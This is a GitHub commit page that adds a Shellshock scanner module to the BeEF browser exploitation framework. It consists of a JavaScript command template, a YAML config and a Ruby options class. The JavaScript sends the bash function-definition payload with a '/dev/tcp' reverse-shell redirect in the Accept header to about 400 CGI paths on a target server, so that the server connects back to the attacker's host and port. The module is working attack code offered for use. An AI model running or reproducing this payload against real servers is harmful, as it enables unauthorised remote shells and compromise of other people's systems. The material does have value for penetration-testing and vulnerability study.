Skip to content
Permalink
Browse files

Add Shell Shock Scanner module

  • Loading branch information
bcoles committed Oct 30, 2014
1 parent fb57121 commit cc0993a2eb54ae865f5f41c2381cb981fedacff1
@@ -0,0 +1,75 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
var rproto = '<%= @rproto %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
var wait = '<%= @wait %>';
var timeout = '<%= @timeout %>';

get_cgi = function(uri) {
try {
var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
var xhr = new XMLHttpRequest();
xhr.open(method, target+uri, true);
xhr.onload = function () {
};
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
}
}
xhr.setRequestHeader("Accept", payload);
xhr.send(null);
} catch (e){
beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
}
}

var scripts = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
file_handle.each_line do |line|
uri = line.chomp!
next if uri =~ /^#/
next if uri.nil?
scripts << "'#{uri}'"
end
end
scripts.shuffle.join(",\n")
%>
);

// add scripts to queue
var requests = [];
for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);

// process queue
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
} else cleanup();
}, wait*1000);

// clean up
cleanup = function() {
if (handle) {
beef.debug("Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("cleanup();", timeout*1000);

});
@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
shell_shock_scanner:
enable: true
category: "Exploits"
name: "Shell Shock Scanner (Reverse Shell)"
description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
target:
working: ["ALL"]
@@ -0,0 +1,42 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Shell_shock_scanner < BeEF::Core::Command

def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
{ 'name' => 'rproto',
'type' => 'combobox',
'ui_label' => 'Target Protocol',
'store_type' => 'arraystore',
'store_fields' => ['rproto'],
'store_data' => [
['http'],
['https']
],
'emptyText' => 'Select a protocol (HTTP/HTTPS)',
'valueField' => 'rproto',
'displayField' => 'rproto',
'mode' => 'local',
'autoWidth' => true
},
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
]
end

def post_execute
save({'result' => @datastore['result']})
end

end

0 comments on commit cc0993a

Please sign in to comment.
You can’t perform that action at this time.